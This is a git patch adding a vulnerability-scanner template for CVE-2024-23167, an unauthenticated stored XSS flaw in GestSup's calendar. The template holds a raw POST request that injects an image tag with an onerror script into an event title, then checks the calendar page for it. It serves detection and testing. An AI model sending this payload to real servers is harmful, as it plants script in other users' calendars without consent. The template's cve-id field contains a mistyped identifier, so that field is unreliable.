From b88a78cfef16dd48c0e0c77a5fc59b08c89249d0 Mon Sep 17 00:00:00 2001
From: soonghee2 <soonghee2@ajou.ac.kr>
Date: Wed, 7 Aug 2024 22:06:40 +0900
Subject: [PATCH] Added/Fixed/Updated CVE-2024-23167 Template

---
 http/cves/2024/CVE-2024-23167.yaml | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-23167.yaml

diff --git a/http/cves/2024/CVE-2024-23167.yaml b/http/cves/2024/CVE-2024-23167.yaml
new file mode 100644
index 0000000000..35d1ba4395
--- /dev/null
+++ b/http/cves/2024/CVE-2024-23167.yaml
@@ -0,0 +1,47 @@
+id: CVE-2024-23167
+
+info:
+  name: Unauthenticated stored XSS on calendar events (CVE-2024-23167)
+  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
+  severity: high
+  description: GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.
+  impact: |
+   This vulnerability could allow unauthenticated attackers to compromise users accessing the Calendar feature of the application.
+  remediation:
+   Apply security patches, validate and sanitize inputs to prevent XSS, and ensure proper authentication. Prevent JavaScript execution in the calendar.php file.
+  reference:
+   https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
+   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23167
+   https://doc.gestsup.fr/install/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2024-231637
+  metadata:
+    max-request: 2
+    vendor: gestsup
+    product: 
+     gestsup ver 3.2.15
+     Mariadb ver 10.7
+  tags: cve2024, cve, xss, web
+  
+
+requests:
+  - raw:
+      - |
+        POST /ajax/calendar.php HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        action=add_event&title=<img/src/onerror=alert(1)>&start=2024/7/30 07:30:00&end=2024/7/30 08:00:00&allday=false&technician=1
+
+      - |
+        GET /index.php?page=calendar HTTP/1.1
+        Cookie: PHPSESSID=9930071b83c5d8aad093aebf8e60a719
+
+    matchers:
+      - type: word
+        words:
+          - '<img'
+          - 'alert(1)'
+        part: body
\ No newline at end of file